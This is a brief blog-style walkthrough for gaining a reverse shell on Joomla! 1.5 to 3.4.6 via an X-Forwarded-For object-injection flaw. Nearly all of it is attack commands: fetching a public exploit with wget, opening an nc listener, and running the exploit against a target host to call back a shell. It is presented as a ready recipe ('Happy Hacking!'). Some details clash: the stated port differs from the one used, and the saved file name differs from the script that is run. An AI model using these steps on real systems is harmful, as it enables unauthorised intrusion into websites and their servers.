How to upload a shell in Joomla! 1.5 < 3.4.6
Joomla! 1.5 < 3.4.6 Remote Code Execution
Joomla! cms between version 1.5 until 3.4.6 allows Object Injection in ‘x-forwarded-for’ Header which leads to a Remote Code Execution.
you can download the exploit from Exploit-DB using:
wget https://www.exploit-db.com/download/39033 -O exploit.py
and then we need to set up a TCP listen on port 4546:
nc -nlvp 1234
now everything should be ready and we just need to specify the port and the LHOST and then run the exploit to spawn a reverse shell:
python joomla-rce-2-shell.py -t http://10.10.10.116/ -l 10.10.14.7 -p 1234
Happy Hacking!
Comments are closed, but trackbacks and pingbacks are open.